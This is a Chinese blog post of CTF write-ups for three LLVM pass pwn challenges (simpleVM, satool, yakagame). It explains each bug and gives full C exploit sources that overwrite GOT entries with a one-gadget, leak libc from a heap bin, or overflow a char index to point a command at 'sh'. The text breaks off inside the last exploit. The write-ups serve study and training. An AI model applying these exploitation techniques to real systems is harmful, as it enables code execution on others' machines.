标签：1024 llvm return void i64 add pass pwn nsw

llvm pass pwn 入门学习

对于没有学习过C++的人来说很不友好，仿佛让我回到学习java的时候(java烂的一批)，各种包，函数，实现类，什么迭代器，红黑树什么的，看来抽点时间学习一下c++是有必要的

环境

说实话这个环境搞了两天，老是报Error opening 'LLVMHello.so': LLVMHello.so: cannot open shared object file: No such file or directory这个错误解决方法就是加上绝对路径就行了或者在.bashrc或.zshrc中修改一下环境变量 export LD_LIBRARY_PATH=$LD_LIBRARY_PATH:.但是加上这个环境变量后就会出现一个问题：如果当前目录下有任何glibc的so文件就会直接加载它这就会导致出现Segmentation fault (core dumped)这个报错，基本上所有命令都不可以使用，这是一个非常坑的点，我差点以为我的ubuntu要挂了，不过不用担心我们可以将这个环境变量包装成一个命令，可以手动开启和关闭

alias llvm-ld="export LD_LIBRARY_PATH=$LD_LIBRARY_PATH:." 和 alias llvm-rd="unset LD_LIBRARY_PATH"这样就可以放心使用了

一些命令

clang-8 -emit-llvm -S exp.c -o exp.ll 加载指定.so文件编译成中间文件.ll

./opt-8 -load ./VMPass.so -VMPass ./exp.ll 通过.ll文件进行攻击

set args -load VMPass.so -VMPass exp.ll 在调试时设置一些参数

llvm::Pass::preparePassManager 在开始调试时下的断点

如何搜索pass名称: alt+t 输入 namespace便可以找到

可以在/usr/include/llvm-xx/llvm/IR/Instruction.def找到指令对应的编码数

2021红帽杯 simpleVM

程序分析

alt+t找到重写的runOnFunction函数是sub_6830`

这个一部分就是用来判断函数的名字是不是o0o0o0o0

进入sub_6AC0这一部分就是用来分析函数的基本块

进入sub_6B80 就是具体分析基本块的供能，并去实现它

这一部分有点长就不再具体分析，主要就是实现一个vm

主要就是llvm::CallBase这个抽象类，了解下面实现的方法就基本上就可以读懂这个程序的流程

1. Function *getCalledFunction() const： 这个方法用于获取被调用的函数指针。如果函数调用是一个直接调用（CallInst），并且被调用函数是已知的，那么该方法将返回被调用函数的指针；否则，返回 nullptr。
2. bool isIndirectCall() const： 这个方法用于检查函数调用是否是间接调用。如果函数调用是间接调用，那么它的目标函数是在运行时动态决定的，而不是在编译时确定的。
3. Value *getCalledValue() const： 这个方法用于获取函数调用的被调用值。对于直接调用，该方法返回被调用的函数指针；对于间接调用，返回用于动态计算目标函数的值。
4. unsigned getNumArgOperands() const： 这个方法用于获取函数调用指令的参数数量。
5. Value *getArgOperand(unsigned i) const： 这个方法用于获取函数调用指令的第 i 个参数值。
6. void setArgOperand(unsigned i, Value *val)： 这个方法用于设置函数调用指令的第 i 个参数值为指定的 val。
7. OperandBundleUse getOperandBundle(StringRef Name) const： 这个方法用于获取函数调用指令中指定名称的操作数束。操作数束是用于传递额外信息的参数组合。
8. void addOperandBundleUse(OperandBundleUse Bundle)： 这个方法用于向函数调用指令添加一个操作数束。

漏洞就就是load和store可以通过这两个函数实现任意地址读写

漏洞攻击就是修改llvm::legacy::PassManager::~PassManager()的got表，我看好多人都是修改free函数的got表，但是不成功，就发现winmt师傅的方法可以打通，就是修改llvm::legacy::PassManager::~PassManager()的got表为onegadget

llvm::legacy::PassManager::~PassManager() 在 llvm::legacy::PassManager 对象的生命周期结束时被自动调用，用于执行清理和释放资源的操作。在对象的销毁过程中，会自动释放该 Pass 管理器对象所拥有的所有 Pass 对象，确保资源正确释放。

调试过程

add(1, 0x77E100);

效果：向寄存器1指定的地址中写入数据

load(1);

效果：将寄存器1中存放的地址的值放到寄存器2中

min(2, 0x9a6d0);

效果：就是将free函数的真实地址减了0x9a6d0(也就是free函数的偏移)

add(2, 0xe3afe);

效果：就是得到了onegadget的真实地址、

add(1, 0x870);

0x870是free的got表到2llvm::legacy::PassManager::~PassManager()@got.plt的距离

store(1);

效果将llvm::legacy::PassManager::~PassManager()@got.plt里面的值修改为onegadget

exp

// clang-8 -emit-llvm -S exp.c -o exp.ll
void add(int num, long long val);
void min(int num, long long val);
void load(int num);
void store(int num);
 
void o0o0o0o0()
{
    add(1, 0x77E100);   //got 
    load(1);
    min(2, 0x9a6d0);   // free forge
    add(2, 0xe3afe);   // onegadget
    add(1, 0x870);
    store(1);
}
//./opt-8 -load ./VMPass.so  -VMPass ./exp.ll

CISCN-2021 satool

程序分析

还是首先找得到重写的runOnFunction由于是小端序，故函数名应是B4ckDo0r

主要有save,takeaway,stealkey,fakekey,run这几个函数，但只用到了save,stealkey,fakekey,run这几个函数

save

主要效果就是可以申请一个0x20的chunk，需要两个参数

stealkey

效果就是将申请的chunk中的值赋给key

fakekey

效果就是将fakekey的参数和chunk中前八个字节中存放的数进行相加并再次放到chunk

run

就是执行chunk中数据

攻击思路

既然有run这个漏洞，我就设法让chunk中出现onegadget

出现了堆，我们就看一下刚开始时bin中情况

我们可以发现当我们第二次申请chunk时就可以从ubuntu中申请，在联想stealkey和fakekey的功能，因此我们只要第二次使用save时第一个参数为空就行了，再利用stealkey将（main_area+96）放进key中在fakekey时，计算好偏移既可以将chunk放进一个onegadget

exp

void save(char *a, char *b);
void stealkey();
void fakekey(long long x);
void run();
void B4ckDo0r()
{
	save("trunk", "trunk");
	save("", "trunk");
	stealkey();
	fakekey(-0x1ecbf0+0xe3afe);
	run();
}

强网杯-2022 yakagame

程序分析

本题重写的runOnFunction函数为sub_C880，PASS名称为ayaka。

分析可得这是一个元神玩家出的题，

fight函数

好像是一个攻击bss的一个过程，通过比较伤害和bss的血量的差来得到score，如果score大于0x12345678

score的赋值语句是v53 = weaponlist[v54]; *score = v53 - boss; 但是显然是不可能的因为weaponlist数组是char类型的

merge(无关紧要)

就是将某个武器的伤害加到另一个武器上

destroy(无关紧要)

将选择的武器伤害置零

upgrade(无关紧要)

将所有的武器伤害加上一个数值

4个对cmd的运算

可以对cmd进行加减异或运算，将原本的字符0x92, 0x68, 0x7B, 0x27, 0x6D, 0x93, 0x68, 0x66转换为cat flag的asicc

else(非常重要)

由于之前没学习过c++ ,这里面使用了红黑树和迭代器混合进行一系列的操作，分析的时候基本不懂，调试老长时间才分析出大概流程(用词表达可能会很不恰当请见谅)

就是它会将不属于上面的所有函数和对应的参数用键值来一一对应，第一次进行配对时无法进入 if ( (std::operator==<char>(v22, v58) & 1) != 0 )中，只有第二次出现同一个函数名时才会进入，而且 weaponlist[v33] = *(_BYTE *)(v24 + 0x20);中的v24时函数第一次出现时对应的参数，第二次出现的参数没有任何影响，这个赋值有一个漏洞就是v33是char类型,并且cmd和score就在weaponlist数组上面，也就是我们可以通过char类型整数溢出来修改score和cmd

exp

其实有两种，一种就是利用它给的四种运算得到cat flag，另一种就是直接修改cmd，让它指向sh

第一种：直接修改cmd

void fight(int weapon){return;}
void trunk000(int x){return;}
void trunk001(int x){return;}
void trunk002(int x){return;}
void trunk003(int x){return;}
void trunk004(int x){return;}
void trunk005(int x){return;}
void trunk006(int x){return;}
void trunk007(int x){return;}
void trunk008(int x){return;}
void trunk009(int x){return;}
void trunk010(int x){return;}
void trunk011(int x){return;}
void trunk012(int x){return;}
void trunk013(int x){return;}
void trunk014(int x){return;}
void trunk015(int x){return;}
void trunk016(int x){return;}
void trunk017(int x){return;}
void trunk018(int x){return;}
void trunk019(int x){return;}
void trunk020(int x){return;}
void trunk021(int x){return;}
void trunk022(int x){return;}
void trunk023(int x){return;}
void trunk024(int x){return;}
void trunk025(int x){return;}
void trunk026(int x){return;}
void trunk027(int x){return;}
void trunk028(int x){return;}
void trunk029(int x){return;}
void trunk030(int x){return;}
void trunk031(int x){return;}
void trunk032(int x){return;}
void trunk033(int x){return;}
void trunk034(int x){return;}
void trunk035(int x){return;}
void trunk036(int x){return;}
void trunk037(int x){return;}
void trunk038(int x){return;}
void trunk039(int x){return;}
void trunk040(int x){return;}
void trunk041(int x){return;}
void trunk042(int x){return;}
void trunk043(int x){return;}
void trunk044(int x){return;}
void trunk045(int x){return;}
void trunk046(int x){return;}
void trunk047(int x){return;}
void trunk048(int x){return;}
void trunk049(int x){return;}
void trunk050(int x){return;}
void trunk051(int x){return;}
void trunk052(int x){return;}
void trunk053(int x){return;}
void trunk054(int x){return;}
void trunk055(int x){return;}
void trunk056(int x){return;}
void trunk057(int x){return;}
void trunk058(int x){return;}
void trunk059(int x){return;}
void trunk060(int x){return;}
void trunk061(int x){return;}
void trunk062(int x){return;}
void trunk063(int x){return;}
void trunk064(int x){return;}
void trunk065(int x){return;}
void trunk066(int x){return;}
void trunk067(int x){return;}
void trunk068(int x){return;}
void trunk069(int x){return;}
void trunk070(int x){return;}
void trunk071(int x){return;}
void trunk072(int x){return;}
void trunk073(int x){return;}
void trunk074(int x){return;}
void trunk075(int x){return;}
void trunk076(int x){return;}
void trunk077(int x){return;}
void trunk078(int x){return;}
void trunk079(int x){return;}
void trunk080(int x){return;}
void trunk081(int x){return;}
void trunk082(int x){return;}
void trunk083(int x){return;}
void trunk084(int x){return;}
void trunk085(int x){return;}
void trunk086(int x){return;}
void trunk087(int x){return;}
void trunk088(int x){return;}
void trunk089(int x){return;}
void trunk090(int x){return;}
void trunk091(int x){return;}
void trunk092(int x){return;}
void trunk093(int x){return;}
void trunk094(int x){return;}
void trunk095(int x){return;}
void trunk096(int x){return;}
void trunk097(int x){return;}
void trunk098(int x){return;}
void trunk099(int x){return;}
void trunk100(int x){return;}
void trunk101(int x){return;}
void trunk102(int x){return;}
void trunk103(int x){return;}
void trunk104(int x){return;}
void trunk105(int x){return;}
void trunk106(int x){return;}
void trunk107(int x){return;}
void trunk108(int x){return;}
void trunk109(int x){return;}
void trunk110(int x){return;}
void trunk111(int x){return;}
void trunk112(int x){return;}
void trunk113(int x){return;}
void trunk114(int x){return;}
void trunk115(int x){return;}
void trunk116(int x){return;}
void trunk117(int x){return;}
void trunk118(int x){return;}
void trunk119(int x){return;}
void trunk120(int x){return;}
void trunk121(int x){return;}
void trunk122(int x){return;}
void trunk123(int x){return;}
void trunk124(int x){return;}
void trunk125(int x){return;}
void trunk126(int x){return;}
void trunk127(int x){return;}
void trunk128(int x){return;}
void trunk129(int x){return;}
void trunk130(int x){return;}
void trunk131(int x){return;}
void trunk132(int x){return;}
void trunk133(int x){return;}
void trunk134(int x){return;}
void trunk135(int x){return;}
void trunk136(int x){return;}
void trunk137(int x){return;}
void trunk138(int x){return;}
void trunk139(int x){return;}
void trunk140(int x){return;}
void trunk141(int x){return;}
void trunk142(int x){return;}
void trunk143(int x){return;}
void trunk144(int x){return;}
void trunk145(int x){return;}
void trunk146(int x){return;}
void trunk147(int x){return;}
void trunk148(int x){return;}
void trunk149(int x){return;}
void trunk150(int x){return;}
void trunk151(int x){return;}
void trunk152(int x){return;}
void trunk153(int x){return;}
void trunk154(int x){return;}
void trunk155(int x){return;}
void trunk156(int x){return;}
void trunk157(int x){return;}
void trunk158(int x){return;}
void trunk159(int x){return;}
void trunk160(int x){return;}
void trunk161(int x){return;}
void trunk162(int x){return;}
void trunk163(int x){return;}
void trunk164(int x){return;}
void trunk165(int x){return;}
void trunk166(int x){return;}
void trunk167(int x){return;}
void trunk168(int x){return;}
void trunk169(int x){return;}
void trunk170(int x){return;}
void trunk171(int x){return;}
void trunk172(int x){return;}
void trunk173(int x){return;}
void trunk174(int x){return;}
void trunk175(int x){return;}
void trunk176(int x){return;}
void trunk177(int x){return;}
void trunk178(int x){return;}
void trunk179(int x){return;}
void trunk180(int x){return;}
void trunk181(int x){return;}
void trunk182(int x){return;}
void trunk183(int x){return;}
void trunk184(int x){return;}
void trunk185(int x){return;}
void trunk186(int x){return;}
void trunk187(int x){return;}
void trunk188(int x){return;}
void trunk189(int x){return;}
void trunk190(int x){return;}
void trunk191(int x){return;}
void trunk192(int x){return;}
void trunk193(int x){return;}
void trunk194(int x){return;}
void trunk195(int x){return;}
void trunk196(int x){return;}
void trunk197(int x){return;}
void trunk198(int x){return;}
void trunk199(int x){return;}
void trunk200(int x){return;}
void trunk201(int x){return;}
void trunk202(int x){return;}
void trunk203(int x){return;}
void trunk204(int x){return;}
void trunk205(int x){return;}
void trunk206(int x){return;}
void trunk207(int x){return;}
void trunk208(int x){return;}
void trunk209(int x){return;}
void trunk210(int x){return;}
void trunk211(int x){return;}
void trunk212(int x){return;}
void trunk213(int x){return;}
void trunk214(int x){return;}
void trunk215(int x){return;}
void trunk216(int x){return;}
void trunk217(int x){return;}
void trunk218(int x){return;}
void trunk219(int x){return;}
void trunk220(int x){return;}
void trunk221(int x){return;}
void trunk222(int x){return;}
void trunk223(int x){return;}
void trunk224(int x){return;}
void trunk225(int x){return;}
void trunk226(int x){return;}
void trunk227(int x){return;}
void trunk228(int x){return;}
void trunk229(int x){return;}
void trunk230(int x){return;}
void trunk231(int x){return;}
void trunk232(int x){return;}
void trunk233(int x){return;}
void trunk234(int x){return;}
void trunk235(int x){return;}
void trunk236(int x){return;}
void trunk237(int x){return;}
void trunk238(int x){return;}
void trunk239(int x){return;}
void trunk240(int x){return;}
void trunk241(int x){return;}
void trunk242(int x){return;}
void trunk243(int x){return;}
void trunk244(int x){return;}
void trunk245(int x){return;}
void trunk246(int x){return;}
void trunk247(int x){return;}
void trunk248(int x){return;}
void trunk249(int x){return;}
void trunk250(int x){return;}
void trunk251(int x){return;}
void trunk252(int x){return;}
void trunk253(int x){return;}
void trunk254(int x){return;}
void trunk255(int x){return;}
void gamestart()
{
    trunk000(0);
    trunk001(0);
    trunk002(0);
    trunk003(0);
    trunk004(0);
    trunk005(0);
    trunk006(0);
    trunk007(0);
    trunk008(0);
    trunk009(0);
    trunk010(0);
    trunk011(0);
    trunk012(0);
    trunk013(0);
    trunk014(0);
    trunk015(0);
    trunk016(0);
    trunk017(0);
    trunk018(0);
    trunk019(0);
    trunk020(0);
    trunk021(0);
    trunk022(0);
    trunk023(0);
    trunk024(0);
    trunk025(0);
    trunk026(0);
    trunk027(0);
    trunk028(0);
    trunk029(0);
    trunk030(0);
    trunk031(0);
    trunk032(0);
    trunk033(0);
    trunk034(0);
    trunk035(0);
    trunk036(0);
    trunk037(0);
    trunk038(0);
    trunk039(0);
    trunk040(0);
    trunk041(0);
    trunk042(0);
    trunk043(0);
    trunk044(0);
    trunk045(0);
    trunk046(0);
    trunk047(0);
    trunk048(0);
    trunk049(0);
    trunk050(0);
    trunk051(0);
    trunk052(0);
    trunk053(0);
    trunk054(0);
    trunk055(0);
    trunk056(0);
    trunk057(0);
    trunk058(0);
    trunk059(0);
    trunk060(0);
    trunk061(0);
    trunk062(0);
    trunk063(0);
    trunk064(0);
    trunk065(0);
    trunk066(0);
    trunk067(0);
    trunk068(0);
    trunk069(0);
    trunk070(0);
    trunk071(0);
    trunk072(0);
    trunk073(0);
    trunk074(0);
    trunk075(0);
    trunk076(0);
    trunk077(0);
    trunk078(0);
    trunk079(0);
    trunk080(0);
    trunk081(0);
    trunk082(0);
    trunk083(0);
    trunk084(0);
    trunk085(0);
    trunk086(0);
    trunk087(0);
    trunk088(0);
    trunk089(0);
    trunk090(0);
    trunk091(0);
    trunk092(0);
    trunk093(0);
    trunk094(0);
    trunk095(0);
    trunk096(0);
    trunk097(0);
    trunk098(0);
    trunk099(0);
    trunk100(0);
    trunk101(0);
    trunk102(0);
    trunk103(0);
    trunk104(0);
    trunk105(0);
    trunk106(0);
    trunk107(0);
    trunk108(0);
    trunk109(0);
    trunk110(0);
    trunk111(0);
    trunk112(0);
    trunk113(0);
    trunk114(0);
    trunk115(0);
    trunk116(0);
    trunk117(0);
    trunk118(0);
    trunk119(0);
    trunk120(0);
    trunk121(0);
    trunk122(0);
    trunk123(0);
    trunk124(0);
    trunk125(0);
    trunk126(0);
    trunk127(0);
    trunk128(0);
    trunk129(0);
    trunk130(0);
    trunk131(0);
    trunk132(0);
    trunk133(0);
    trunk134(0);
    trunk135(0);
    trunk136(0);
    trunk137(0);
    trunk138(0);
    trunk139(0);
    trunk140(0);
    trunk141(0);
    trunk142(0);
    trunk143(0);
    trunk144(0);
    trunk145(0);
    trunk146(0);
    trunk147(0);
    trunk148(0);
    trunk149(0);
    trunk150(0);
    trunk151(0);
    trunk152(0);
    trunk153(0);
    trunk154(0);
    trunk155(0);
    trunk156(0);
    trunk157(0);
    trunk158(0);
    trunk159(0);
    trunk160(0);
    trunk161(0);
    trunk162(0);
    trunk163(0);
    trunk164(0);
    trunk165(0);
    trunk166(0);
    trunk167(0);
    trunk168(0);
    trunk169(0);
    trunk170(0);
    trunk171(0);
    trunk172(0);
    trunk173(0);
    trunk174(0);
    trunk175(0);
    trunk176(0);
    trunk177(0);
    trunk178(0);
    trunk179(0);
    trunk180(0);
    trunk181(0);
    trunk182(0);
    trunk183(0);
    trunk184(0);
    trunk185(0);
    trunk186(0);
    trunk187(0);
    trunk188(0);
    trunk189(0);
    trunk190(0);
    trunk191(0);
    trunk192(0);
    trunk193(0);
    trunk194(0);
    trunk195(0);
    trunk196(0);
    trunk197(0);
    trunk198(0);
    trunk199(0);
    trunk200(0);
    trunk201(0);
    trunk202(0);
    trunk203(0);
    trunk204(0);
    trunk205(0);
    trunk206(0);
    trunk207(0);
    trunk208(0);
    trunk209(0);
    trunk210(0);
    trunk211(0);
    trunk212(0);
    trunk213(0);
    trunk214(0);
    trunk215(0);
    trunk216(0);
    trunk217(0);
    trunk218(0);
    trunk219(0);
    trunk220(0);
    trunk221(0);
    trunk222(0);
    trunk223(0);
    trunk224(0);
    trunk225(0);
    trunk226(0);
    trunk227(0);
    trunk228(0);
    trunk229(0);
    trunk230(0);
    trunk231(0);
    //修改cmd  0x6EFDAD	sh

    trunk232(0xad);
    trunk233(0xfd);
    trunk234(0x6e);
    trunk235(0);
    
    trunk236(0);
    trunk237(0);
    trunk238(0);
    trunk239(0);
    trunk240(0);
    //修改score
    trunk241(0);
    trunk242(0x40);
    trunk243(0);
    trunk244(0);
    
    trunk245(0);
    trunk246(0);
    trunk247(0);
    trunk248(0);
    trunk249(0);
    trunk250(0);
    trunk251(0);
    trunk252(0);
    trunk253(0);
    trunk254(0);
    trunk255(0);
    
    
    trunk232(0xad);
    trunk233(0xfd);
    trunk234(0x6e);
    trunk235(0);
    
    
    trunk241(0);
    trunk242(0);
    trunk243(0);
    trunk244(0);
        
    fight(0);
    
}

第二种

就是将0x92, 0x68, 0x7B, 0x27, 0x6D, 0x93, 0x68, 经过运算得到 0x63 0x61 0x74 0x20 0x66 0x6C 0x61 0x67

菜鸡打算自己写一个脚本爆破一下，结果发现不行

我看C0Lin师傅使用下面方法得到的

​ tiandongwanxiang();
​ wuxiangdeyidao();
​ zhanjinniuza();
​ guobapenhuo();
​ tiandongwanxiang();
​ tiandongwanxiang();
​ tiandongwanxiang();
​ tiandongwanxiang();
​ tiandongwanxiang();
​ tiandongwanxiang();
​ tiandongwanxiang();
​ tiandongwanxiang();
​ tiandongwanxiang();
​ wuxiangdeyidao();
​ zhanjinniuza();

void fight(int weapon){return;}
void wuxiangdeyidao(){return;}
void zhanjinniuza(){return;}
void guobapenhuo(){return;}
void tiandongwanxiang(){return;}
void upgrade(int val){return;}
void trunk000(int x){return;}
void trunk001(int x){return;}
void trunk002(int x){return;}
void trunk003(int x){return;}
void trunk004(int x){return;}
void trunk005(int x){return;}
void trunk006(int x){return;}
void trunk007(int x){return;}
void trunk008(int x){return;}
void trunk009(int x){return;}
void trunk010(int x){return;}
void trunk011(int x){return;}
void trunk012(int x){return;}
void trunk013(int x){return;}
void trunk014(int x){return;}
void trunk015(int x){return;}
void trunk016(int x){return;}
void trunk017(int x){return;}
void trunk018(int x){return;}
void trunk019(int x){return;}
void trunk020(int x){return;}
void trunk021(int x){return;}
void trunk022(int x){return;}
void trunk023(int x){return;}
void trunk024(int x){return;}
void trunk025(int x){return;}
void trunk026(int x){return;}
void trunk027(int x){return;}
void trunk028(int x){return;}
void trunk029(int x){return;}
void trunk030(int x){return;}
void trunk031(int x){return;}
void trunk032(int x){return;}
void trunk033(int x){return;}
void trunk034(int x){return;}
void trunk035(int x){return;}
void trunk036(int x){return;}
void trunk037(int x){return;}
void trunk038(int x){return;}
void trunk039(int x){return;}
void trunk040(int x){return;}
void trunk041(int x){return;}
void trunk042(int x){return;}
void trunk043(int x){return;}
void trunk044(int x){return;}
void trunk045(int x){return;}
void trunk046(int x){return;}
void trunk047(int x){return;}
void trunk048(int x){return;}
void trunk049(int x){return;}
void trunk050(int x){return;}
void trunk051(int x){return;}
void trunk052(int x){return;}
void trunk053(int x){return;}
void trunk054(int x){return;}
void trunk055(int x){return;}
void trunk056(int x){return;}
void trunk057(int x){return;}
void trunk058(int x){return;}
void trunk059(int x){return;}
void trunk060(int x){return;}
void trunk061(int x){return;}
void trunk062(int x){return;}
void trunk063(int x){return;}
void trunk064(int x){return;}
void trunk065(int x){return;}
void trunk066(int x){return;}
void trunk067(int x){return;}
void trunk068(int x){return;}
void trunk069(int x){return;}
void trunk070(int x){return;}
void trunk071(int x){return;}
void trunk072(int x){return;}
void trunk073(int x){return;}
void trunk074(int x){return;}
void trunk075(int x){return;}
void trunk076(int x){return;}
void trunk077(int x){return;}
void trunk078(int x){return;}
void trunk079(int x){return;}
void trunk080(int x){return;}
void trunk081(int x){return;}
void trunk082(int x){return;}
void trunk083(int x){return;}
void trunk084(int x){return;}
void trunk085(int x){return;}
void trunk086(int x){return;}
void trunk087(int x){return;}
void trunk088(int x){return;}
void trunk089(int x){return;}
void trunk090(int x){return;}
void trunk091(int x){return;}
void trunk092(int x){return;}
void trunk093(int x){return;}
void trunk094(int x){return;}
void trunk095(int x){return;}
void trunk096(int x){return;}
void trunk097(int x){return;}
void trunk098(int x){return;}
void trunk099(int x){return;}
void trunk100(int x){return;}
void trunk101(int x){return;}
void trunk102(int x){return;}
void trunk103(int x){return;}
void trunk104(int x){return;}
void trunk105(int x){return;}
void trunk106(int x){return;}
void trunk107(int x){return;}
void trunk108(int x){return;}
void trunk109(int x){return;}
void trunk110(int x){return;}
void trunk111(int x){return;}
void trunk112(int x){return;}
void trunk113(int x){return;}
void trunk114(int x){return;}
void trunk115(int x){return;}
void trunk116(int x){return;}
void trunk117(int x){return;}
void trunk118(int x){return;}
void trunk119(int x){return;}
void trunk120(int x){return;}
void trunk121(int x){return;}
void trunk122(int x){return;}
void trunk123(int x){return;}
void trunk124(int x){return;}
void trunk125(int x){return;}
void trunk126(int x){return;}
void trunk127(int x){return;}
void trunk128(int x){return;}
void trunk129(int x){return;}
void trunk130(int x){return;}
void trunk131(int x){return;}
void trunk132(int x){return;}
void trunk133(int x){return;}
void trunk134(int x){return;}
void trunk135(int x){return;}
void trunk136(int x){return;}
void trunk137(int x){return;}
void trunk138(int x){return;}
void trunk139(int x){return;}
void trunk140(int x){return;}
void trunk141(int x){return;}
void trunk142(int x){return;}
void trunk143(int x){return;}
void trunk144(int x){return;}
void trunk145(int x){return;}
void trunk146(int x){return;}
void trunk147(int x){return;}
void trunk148(int x){return;}
void trunk149(int x){return;}
void trunk150(int x){return;}
void trunk151(int x){return;}
void trunk152(int x){return;}
void trunk153(int x){return;}
void trunk154(int x){return;}
void trunk155(int x){return;}
void trunk156(int x){return;}
void trunk157(int x){return;}
void trunk158(int x){return;}
void trunk159(int x){return;}
void trunk160(int x){return;}
void trunk161(int x){return;}
void trunk162(int x){return;}
void trunk163(int x){return;}
void trunk164(int x){return;}
void trunk165(int x){return;}
void trunk166(int x){return;}
void trunk167(int x){return;}
void trunk168(int x){return;}
void trunk169(int x){return;}
void trunk170(int x){return;}
void trunk171(int x){return;}
void trunk172(int x){return;}
void trunk173(int x){return;}
void trunk174(int x){return;}
void trunk175(int x){return;}
void trunk176(int x){return;}
void trunk177(int x){return;}
void trunk178(int x){return;}
void trunk179(int x){return;}
void trunk180(int x){return;}
void trunk181(int x){return;}
void trunk182(int x){return;}
void trunk183(int x){return;}
void trunk184(int x){return;}
void trunk185(int x){return;}
void trunk186(int x){return;}
void trunk187(int x){return;}
void trunk188(int x){return;}
void trunk189(int x){return;}
void trunk190(int x){return;}
void trunk191(int x){return;}
void trunk192(int x){return;}
void trunk193(int x){return;}
void trunk194(int x){return;}
void trunk195(int x){return;}
void trunk196(int x){return;}
void trunk197(int x){return;}
void trunk198(int x){return;}
void trunk199(int x){return;}
void trunk200(int x){return;}
void trunk201(int x){return;}
void trunk202(int x){return;}
void trunk203(int x){return;}
void trunk204(int x){return;}
void trunk205(int x){return;}
void trunk206(int x){return;}
void trunk207(int x){return;}
void trunk208(int x){return;}
void trunk209(int x){return;}
void trunk210(int x){return;}
void trunk211(int x){return;}
void trunk212(int x){return;}
void trunk213(int x){return;}
void trunk214(int x){return;}
void trunk215(int x){return;}
void trunk216(int x){return;}
void trunk217(int x){return;}
void trunk218(int x){return;}
void trunk219(int x){return;}
void trunk220(int x){return;}
void trunk221(int x){return;}
void trunk222(int x){return;}
void trunk223(int x){return;}
void trunk224(int x){return;}
void trunk225(int x){return;}
void trunk226(int x){return;}
void trunk227(int x){return;}
void trunk228(int x){return;}
void trunk229(int x){return;}
void trunk230(int x){return;}
void trunk231(int x){return;}
void trunk232(int x){return;}
void trunk233(int x){return;}
void trunk234(int x){return;}
void trunk235(int x){return;}
void trunk236(int x){return;}
void trunk237(int x){return;}
void trunk238(int x){return;}
void trunk239(int x){return;}
void trunk240(int x){return;}
void trunk241(int x){return;}
void trunk242(int x){return;}
void trunk243(int x){return;}
void trunk244(int x){return;}
void trunk245(int x){return;}
void trunk246(int x){return;}
void trunk247(int x){return;}
void trunk248(int x){return;}
void trunk249(int x){return;}
void trunk250(int x){return;}
void trunk251(int x){return;}
void trunk252(int x){return;}
void trunk253(int x){return;}
void trunk254(int x){return;}
void trunk255(int x){return;}
void gamestart()
{
    trunk000(0);
    trunk001(0);
    trunk002(0);
    trunk003(0);
    trunk004(0);
    trunk005(0);
    trunk006(0);
    trunk007(0);
    trunk008(0);
    trunk009(0);
    trunk010(0);
    trunk011(0);
    trunk012(0);
    trunk013(0);
    trunk014(0);
    trunk015(0);
    trunk016(0);
    trunk017(0);
    trunk018(0);
    trunk019(0);
    trunk020(0);
    trunk021(0);
    trunk022(0);
    trunk023(0);
    trunk024(0);
    trunk025(0);
    trunk026(0);
    trunk027(0);
    trunk028(0);
    trunk029(0);
    trunk030(0);
    trunk031(0);
    trunk032(0);
    trunk033(0);
    trunk034(0);
    trunk035(0);
    trunk036(0);
    trunk037(0);
    trunk038(0);
    trunk039(0);
    trunk040(0);
    trunk041(0);
    trunk042(0);
    trunk043(0);
    trunk044(0);
    trunk045(0);
    trunk046(0);
    trunk047(0);
    trunk048(0);
    trunk049(0);
    trunk050(0);
    trunk051(0);
    trunk052(0);
    trunk053(0);
    trunk054(0);
    trunk055(0);
    trunk056(0);
    trunk057(0);
    trunk058(0);
    trunk059(0);
    trunk060(0);
    trunk061(0);
    trunk062(0);
    trunk063(0);
    trunk064(0);
    trunk065(0);
    trunk066(0);
    trunk067(0);
    trunk068(0);
    trunk069(0);
    trunk070(0);
    trunk071(0);
    trunk072(0);
    trunk073(0);
    trunk074(0);
    trunk075(0);
    trunk076(0);
    trunk077(0);
    trunk078(0);
    trunk079(0);
    trunk080(0);
    trunk081(0);
    trunk082(0);
    trunk083(0);
    trunk084(0);
    trunk085(0);
    trunk086(0);
    trunk087(0);
    trunk088(0);
    trunk089(0);
    trunk090(0);
    trunk091(0);
    trunk092(0);
    trunk093(0);
    trunk094(0);
    trunk095(0);
    trunk096(0);
    trunk097(0);
    trunk098(0);
    trunk099(0);
    trunk100(0);
    trunk101(0);
    trunk102(0);
    trunk103(0);
    trunk104(0);
    trunk105(0);
    trunk106(0);
    trunk107(0);
    trunk108(0);
    trunk109(0);
    trunk110(0);
    trunk111(0);
    trunk112(0);
    trunk113(0);
    trunk114(0);
    trunk115(0);
    trunk116(0);
    trunk117(0);
    trunk118(0);
    trunk119(0);
    trunk120(0);
    trunk121(0);
    trunk122(0);
    trunk123(0);
    trunk124(0);
    trunk125(0);
    trunk126(0);
    trunk127(0);
    trunk128(0);
    trunk129(0);
    trunk130(0);
    trunk131(0);
    trunk132(0);
    trunk133(0);
    trunk134(0);
    trunk135(0);
    trunk136(0);
    trunk137(0);
    trunk138(0);
    trunk139(0);
    trunk140(0);
    trunk141(0);
    trunk142(0);
    trunk143(0);
    trunk144(0);
    trunk145(0);
    trunk146(0);
    trunk147(0);
    trunk148(0);
    trunk149(0);
    trunk150(0);
    trunk151(0);
    trunk152(0);
    trunk153(0);
    trunk154(0);
    trunk155(0);
    trunk156(0);
    trunk157(0);
    trunk158(0);
    trunk159(0);
    trunk160(0);
    trunk161(0);
    trunk162(0);
    trunk163(0);
    trunk164(0);
    trunk165(0);
    trunk166(0);
    trunk167(0);
    trunk168(0);
    trunk169(0);
    trunk170(0);
    trunk171(0);
    trunk172(0);
    trunk173(0);
    trunk174(0);
    trunk175(0);
    trunk176(0);
    trunk177(0);
    trunk178(0);
    trunk179(0);
    trunk180(0);
    trunk181(0);
    trunk182(0);
    trunk183(0);
    trunk184(0);
    trunk185(0);
    trunk186(0);
    trunk187(0);
    trunk188(0);
    trunk189(0);
    trunk190(0);
    trunk191(0);
    trunk192(0);
    trunk193(0);
    trunk194(0);
    trunk195(0);
    trunk196(0);
    trunk197(0);
    trunk198(0);
    trunk199(0);
    trunk200(0);
    trunk201(0);
    trunk202(0);
    trunk203(0);
    trunk204(0);
    trunk205(0);
    trunk206(0);
    trunk207(0);
    trunk208(0);
    trunk209(0);
    trunk210(0);
    trunk211(0);
    trunk212(0);
    trunk213(0);
    trunk214(0);
    trunk215(0);
    trunk216(0);
    trunk217(0);
    trunk218(0);
    trunk219(0);
    trunk220(0);
    trunk221(0);
    trunk222(0);
    trunk223(0);
    trunk224(0);
    trunk225(0);
    trunk226(0);
    trunk227(0);
    trunk228(0);
    trunk229(0);
    trunk230(0);
    trunk231(0);
    //修改cmd  0x6EFDAD	sh

    trunk232(0xad);
    trunk233(0xfd);
